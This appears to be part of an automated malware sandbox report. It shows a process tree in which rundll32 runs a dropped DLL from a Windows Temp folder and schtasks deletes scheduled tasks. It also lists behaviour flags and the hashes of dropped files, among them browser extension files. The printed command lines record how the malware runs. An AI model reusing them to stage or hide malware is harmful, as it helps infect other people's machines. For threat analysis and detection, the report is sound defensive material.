C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vFsADyudLcNCFLIiL"2⤵PID:3452
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\AZgKexhzWxKGMSOL\HSZuMYho\kqAXYOr.dll",#1 /Hesite_iduAK 3851181⤵PID:3240
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\AZgKexhzWxKGMSOL\HSZuMYho\kqAXYOr.dll",#1 /Hesite_iduAK 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3732 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LPyXfDhiQUyhASpny"3⤵PID:4408
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD588902c32c720b4f08ee8eef55f5902a3
SHA146ead164eea9f68995d849f191a111a7b502cdcb
SHA2561c8fddadbbcefb95ca25e033607304620756482bd625a91f5434dc54fe6386ea
SHA5129651217686a19a5dd5a9bc37f3d2eeb6eb08c0d46dba55c487b1d6e3371fb5d1593df89f531f409e57fe9e2cc6331081765c629c36a572d5edf155adb8312e85
-
Filesize
2KB
MD582ad89680201ca49547427005002357b
SHA1a9fa11f57bebe39407db1277f3250a794e1b6dba
SHA2567a9ac0db48464bc3fa13de88c8a8fae7f3908f39c80dc81f72aa88c95b4cb004
SHA512a28e9a1a7c4de84a8ae50a211662e26a8d35a3b51e44dde9869697c1172eed3755a8b936ca5a4787d3da57f7597df21955ae88ad5d9559752757956f5dbe8898
-
Filesize
2KB
MD559fcafe4fb048e3a9dcdfc65dcd2a48d
SHA173bc3408ed1b62377def1cc570726364b2c81148
SHA25696c5f79f729ebd4856388502d137a1e1a347200a98869d68c6f6cf5d4e537d54
SHA5127205eecedea1e79e04158c7f2b4bb52023955a0834918dc08bf04c37a8bd343b35b6829e32dee177050d44aecb148040602fcdb4101200bb1f0ae648a14a5532
-
Filesize
2KB
MD564b3b817624befad02067ff605051788
SHA165054a981f249dde176eae79e7a52491927a9bae
SHA25600c0e40a0035b954e87b9f3525139db87f97c67047b7ba00933507d749080874
SHA512eac7ff97aa9f517c568fd4feb349af3633f837e2ede8c85a8995ca2e5cea78d962d33d7d0ef6f250681649dd57fb83405c97b32f1ebbebb384d0af559e63f2a6
-
Filesize
2.0MB
MD53bc49bf9c7b6f5c5978ff88085f23695
SHA12af576329a46b2faba436b2fed54b3a47d1e841a
SHA256c2b9fe66867e1f78f931159ccfc9cee8f3a18003ed1fcb25e26850dbb631823a
SHA5121e3ed7eb2027c1bc2e786c47ae0dc5b06151dc409e6e3de1987f7a04d0c404a1162e0e84dd4bf3800ba9a22aeec11194e64319c73808efa232d67f9807e651a7
-
Filesize
2KB
MD51fe71226eafc5ea3ef503774ea6bec67
SHA1cb69fbd45f33cd965d2375c1cd4def1f78773b1c
SHA2569a1004456187a4299b575e831e88911de9285e7de6301ce8af2fbc6bb9281e04
SHA512444d3719b2c621c220ad4b53364744f47665e39f8827341c60895d7716feb6c0f718b44aa031172fa49948b2c9cf5506a931096c9b9bc03a1478af7aa4542dfa
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5989084aa6d724b20a5a7f8d84a771614
SHA1270c2c5642f42978881dfaa52878f3a4b1661247
SHA25619f9fb362537338d47b860ddda6f1472cb24f9875f7d1c4c0a7ef8c47355d182
SHA512d18ce983747b9e2b55527a4e73c37a08c46b9c8706f65f51a2711c87f8eac88b3882b5b9d74bbdfe0058119357605ae6e9e39a1fced743ce3a0a69ce3bd387dc
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD562ccd33cf63e32982ada4e720d593518
SHA15abc7bffe78b9506f187f72f4b40b411ff888d7b
SHA2563aeb83bc6bc9c8beb029178819443705fd73c83e2805d030d4edd2c2e432f175
SHA5124431096bbbc86290e07972a99d8cf27371abd8430dc681a0c53059fd800b781ed8108465c608258d457caf9731d19738b16ac5124ff134a88cac3828c228c8df
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
3.3MB
MD5174e56b5ed1edbcdd102355a8b56f585
SHA17b525d38bf7bebe1537513d31605d4894c0be158
SHA256fb941b575cb7987c332f90a8383ab5132f31bd148eee13d69dab6aaf41b17461
SHA512d1a5309c83f96fd1dba8c45d6197340fec4f79258804bb1d5cc0a159b454b26ba41a451b09d6bf4cab1dfdaf50f90cd085f7e9e8689b0cbbd537d23837990d04
-
Filesize
3.8MB
MD518e6cb596742ba2a2223c0175503f8b8
SHA1337b7ba7d0a5a731c9e192dca9ce77333d39215a
SHA25671addaa89709d4ebf5f02f459053387063eb4fa6878dfdbe7e08ab2bb46a6f4a
SHA512d2c00a2aee2bbeeca47bb80da766604fa01a5e378813720d174c5376517ea91f972b188174798984c316a9b737f65242ad6ef4c2812eaab84a67b1eec41d07d8
-
Filesize
1.6MB
MD55388d8ecfcd3773c7a5ae78a57c2ad86
SHA1be7df9780599055e0315b3ba8fb1a2683f1ed085
SHA256107e4dc1a515842166619a867808c2e82568892e4b9cf60b827c6dc5841ac41e
SHA5122dfc19d3971f01319ab14f3a1b89838a5754fb73d00bc5ffd07858e4100541b00f041343ae2f69f7d1ae514e20c048dbd60eed71a5e57441e723d0ee4797bd9c
-
Filesize
6.7MB
MD53281414d3675e4c0b3bcec436800f6cb
SHA1d4aea34e5e4e238117fb3d07815995f46454536d
SHA256c67a85e8acddba0f7a25426de4d9c541958ec568703450b07a1d326a340b6136
SHA5123b3e54367894ad5a2cd9123cf65f3a0cbd9c05de31bd6be359011d17cca0d5967adfda1f36b3af717ddee609fe581a1447899da9fb56de446432b22f26317cba
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.1MB
MD5e144fe9c9403a00e7400e01d78218bcb
SHA1e0ef0cf7e2bb12b65287bdd967069add6814e86a
SHA256838acb6c4cf6bdfd497900045a99a93f0e281a6505c38905187a5c3539a0c055
SHA512430956ad81c6d096e1b5208f879d32a36c89c16bdf6ee0426960687e19e7c09b9dae3a92c6b9ea6d3ebc5052dac38f93cdada56ddcbca278abcad90b1f46fae7
-
Filesize
6KB
MD54a84dabe6d36721f2a6095ee748534b3
SHA15db545d58a6b4544a33f80f3f5c0c0ace10d23ce
SHA256567ab5b9913631f13903b12fefeecfd934de26ad4d5eee1af3237212fa34b3c8
SHA512247d258cceee7875b2afe5062d98f51aae136aea7b18c540a69f5f7cc8908adfe6adb663583ceba9856260ea88b91b0448413bef9b000adca9b2a7e34128d876
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD573790a8bee222f129f3e16725e234a53
SHA12af2f30d8fd0f4b200714defe1f5f2d0de9f514c
SHA25650f74901c9fb097380cc3887ed8720bdc259718fe58444f74f212c6aa7687de1
SHA512d2ae22da832a4475302b78716cbe3071055cbf5358a351964b69ea2910fb5322229b8339b8028bdb915773bc6f718f15325b402b4f3e74157b60152910bda999
-
Filesize
6.4MB
MD5b0a4851cd139419fb61dffef02245237
SHA10540309c7c46e9e3d6a3a721c7eda8e06abbfe38
SHA2568b8aa4c6444b829657d364ce8013333befa0dce7a5a39bd53f80e527abc3fe33
SHA5126f147bd59210c73f7732c4fadaa9ec33d5611aa9dbea47de3e17543c4de7e23e7651eb9ce45ce34debb8c6c19d7f9956f69682c2b026b70b6bc530a16ff27172
-
Filesize
6KB
MD53b8a7d2d02cfc5027c6b9219aabcdcfc
SHA1baa69736a2ac637327363111f076a7bef96a3725
SHA25611b305841a9ab1202a380cb4df4a1e240f7d74492d9a2d4ef8389c815bcd93dd
SHA512e7c66fad74d178fa47320eca63c661c7d275621283e12fb18f05accb1e2460455321d4d903eb5870055573ec4b8523cf586b54ffa4dec3830b32b5059183157d
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732